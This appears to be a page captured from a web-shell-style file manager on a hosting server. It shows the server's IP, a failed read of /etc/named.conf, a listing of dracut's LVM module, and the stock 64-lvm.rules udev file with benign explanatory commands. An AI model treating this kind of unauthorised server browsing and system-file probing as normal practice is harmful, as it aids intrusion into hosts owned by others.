Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP: 23.137.84.82 & Your IP: 216.73.216.127
Domains: Can't Read [ /etc/named.conf ]
User: epicgamerzoneco
/usr/lib/dracut/modules.d/90lvm/
Name             Size     Permission  Date
64-lvm.rules     1.28 KB  -rw-r--r--  2022-06-19 22:35
lvm_scan.sh      4.65 KB  -rwxr-xr-x  2022-06-19 22:35
module-setup.sh  3.8 KB   -rwxr-xr-x  2022-06-19 22:35
parse-lvm.sh     491 B    -rwxr-xr-x  2022-06-19 22:35
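These four files are dracut's 90lvm module: module-setup.sh installs the module into the initramfs at build time, 64-lvm.rules is the udev trigger, and lvm_scan.sh and parse-lvm.sh handle volume activation and kernel-command-line parsing. As a quick sanity check (a sketch assuming the usual RHEL image path; adjust for your bootloader layout), dracut's lsinitrd tool can confirm the module's files were packed into the generated image:

# List 90lvm's payload inside the current kernel's initramfs.
# The image path is an assumption, not taken from this listing.
lsinitrd /boot/initramfs-"$(uname -r)".img | grep -E '64-lvm|lvm_scan'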
Contents of 64-lvm.rules:
# hacky rules to try to activate lvm when we get new block devs...
#
# Copyright 2008, Red Hat, Inc.
# Jeremy Katz <katzj@redhat.com>

SUBSYSTEM!="block", GOTO="lvm_end"
ACTION!="add|change", GOTO="lvm_end"

# If the md device is active (indicated by array_state), then set the flag
# LVM_MD_PV_ACTIVATED=1 indicating that the md device for the PV is ready
# to be used. The lvm udev rule running in root will check that this flag
# is set before it will process the md device (it wants to avoid
# processing an md device that exists but is not yet ready to be used.)
KERNEL=="md[0-9]*", ACTION=="change", ENV{ID_FS_TYPE}=="LVM2_member", ENV{LVM_MD_PV_ACTIVATED}!="1", TEST=="md/array_state", ENV{LVM_MD_PV_ACTIVATED}="1"

# Also don't process disks that are slated to be a multipath device
ENV{DM_MULTIPATH_DEVICE_PATH}=="1", GOTO="lvm_end"

KERNEL=="dm-[0-9]*", ACTION=="add", GOTO="lvm_end"
ENV{ID_FS_TYPE}!="LVM?_member", GOTO="lvm_end"

PROGRAM=="/bin/sh -c 'for i in $sys/$devpath/holders/dm-[0-9]*; do [ -e $$i ] && exit 0; done; exit 1;' ", \
    GOTO="lvm_end"

RUN+="/sbin/initqueue --settled --onetime --unique /sbin/lvm_scan"
RUN+="/sbin/initqueue --timeout --name 51-lvm_scan --onetime --unique /sbin/lvm_scan --activationmode degraded"
RUN+="/bin/sh -c '>/tmp/.lvm_scan-%k;'"

LABEL="lvm_end"
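The file queues /sbin/lvm_scan through dracut's initqueue: once udev settles the scan runs once, and if the initqueue timeout fires instead, it retries with --activationmode degraded. A hedged way to watch the matching (a sketch assuming an LVM PV at /dev/sda2, which is illustrative; both commands are standard udevadm subcommands, but /sbin/initqueue exists only inside the initramfs, so on a booted system this only demonstrates the rule match):

# Check the properties the rule keys on: ID_FS_TYPE must be
# "LVM2_member" and the device must not be claimed by multipath.
udevadm info --query=property /dev/sda2 | grep -E 'ID_FS_TYPE|DM_MULTIPATH'

# Dry-run udev rule processing for the device; udevadm test prints
# the RUN+= entries the rules would queue without executing them.
udevadm test --action=add /sys/class/block/sda2 2>&1 | grep -iE 'lvm|RUN'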